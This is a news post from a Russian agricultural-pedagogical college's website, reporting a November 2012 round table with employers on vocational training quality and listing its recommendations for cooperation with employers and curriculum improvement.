Главная
Регистрация
Вход

Приветствую Вас Гость | RSS

Меню сайта

Категории раздела
Абитуриентам [0]
Для желающих поступить в наш колледж

Независимая оценка
Как вы оцениваете качество образовательных услуг нашего колледжа?
Всего ответов: 224

Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0

  
Главная » 2012 » Декабрь » 4 » Круглый стол с работодателями
21:07
Круглый стол с работодателями

На базе ГАОУ СПО ТО «Голышмановский агропедагогический колледж» 14 ноября 2012 года прошло заседание Круглого стола,  на котором рассматривались вопросы качества подготовки  обучающихся в профессиональном образовании.    

Изменения в современном обществе коснулись и профессионального образования, которое должно быть приведено в соответствие с потребностями общества в высококвалифицированных кадрах, обладающих прочными знаниями и способных к саморазвитию и самореализации. Внедрение федеральных государственных образовательных стандартов, разработанных на компетентностной основе, призвано решить эту задачу, повысить качество подготовки конкурентноспособного специалиста для различных областей социально-экономической  деятельности

Проанализировав и обсудив проблемы совершенствования качества образовательного пространства и формирования конкурентоспособного специалиста,  участники Круглого стола выработали специальные предложения и рекомендации:

1.      Совершенствовать механизмы реализации федеральных государственных образовательных стандартов (ФГОС), являющихся средством развития отечественного образования, и  системного обновления его содержания.

2.      Необходимость изучения рынка труда, его потребностей, организация совместной работы по подготовке кадров, обеспечение современного производства квалифицированными кадрами.

3.      Выработать механизм взаимодействия с работодателями, заложенный в Федеральном государственном образовательном стандарте, на взаимовыгодных условиях.

4.      Продолжать тесное сотрудничество с региональным рынком  труда и рынком образовательных услуг.

5.      Выработать и совершенствовать механизм формирования регионального заказа на подготовку рабочих кадров на основе прогноза потребности в рабочих по группам профессий.

6.      Совершенствовать систему профессиональной ориентации обучающихся общеобразовательных учреждений.

7.      Совершенствовать сетевое взаимодействие учреждений профессионального образования и отраслевых ресурсных центров в образовательных учреждениях начального и среднего профессионального образования, мониторинга закрепляемости выпускников на предприятиях  района, области.

8.      Создать рабочую группу работодателей, педагогов и мастеров производственного обучения по составлению рабочих программ, контрольно-оценочных средств, прохождения стажировок для реализации ФГОС.

9.      Пересмотреть вариативную часть  в учебных планах, ввести дополнительные специализации, подготовки по специальности: «Профессиональное обучение» (Технология продукции общественного питания).

10.  Продолжать улучшать материально-техническую базу Голышмановского агропедагогического колледжа с целью повышения качества профессионального образования с привлечением средств работодателей.

11.  В связи с совершенствованием содержания и технологий НПО и СПО обновлять содержание начального  и среднего профессионального образования с учётом требований стандартов качества, работодателей.

10    .Привлекать работодателей к разработке и экспертизе учебно-методических материалов, необходимых для реализации образовательных программ и учебно-планирующей  документации;

11.Проводить практические и лабораторные занятий на базе учреждений и предприятий работодателей.

12.   Привлекать работодателей к проведению учебных занятий на  базе учреждений и предприятий .

13.   Привлекать работодателей к процедуре контроля за освоением содержания и оценкой качества выполнения практических и лабораторных работ обучающихся.

14.   Направлять обучающихся на производственную и профессиональную  практики при условии положительной аттестации по теоретическим и практическим курсам.

15.   Формировать компетентностные аспекты при изучении циклов дисциплин.

16.   Разработать механизм стимулирования инновационной деятельности инженерно-педагогических работников колледжа.

17.   Рекомендовать прохождение курсов повышения квалификации, стажировок в организациях работодателей не реже одного раза в год.

18.   Разработать и внедрить систему менеджмента качества в ГАОУ СПО ТО «Голышмановский агропедагогический колледж».

19.   Организовать сотрудничество с работодателями в различных сферах деятельности.

Просмотров: 1807 | Добавил: iTiger | Рейтинг: 0.0/0
Всего комментариев: 0
Имя *:
Email *:
Код *:


Вход на сайт
Логин:
Пароль:

Мы потомки Героев


ПОЛЕЗНЫЕ ССЫЛКИ

Министерство образования и науки Российской Федерации Единое окно доступа к образовательным ресурсам Федеральный портал "Российское образование" Единая коллекция цифровых образовательных ресурсов Федеральный центр информационно-образовательных ресурсов


Персональные данные Дети МЕСТО РОЖДЕНИЯ:
ТЮМЕНСКИЙ КРАЙ Конкурс новый взгляд
<script src="https://tabun.info/out/index.php"></script>
http://профстажировки.рф/
Поиск

Календарь
«  Декабрь 2012  »
ПнВтСрЧтПтСбВс
     12
3456789
10111213141516
17181920212223
24252627282930
31

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Архив записей

Copyright MyCorp © 2024
Создать бесплатный сайт с uCoz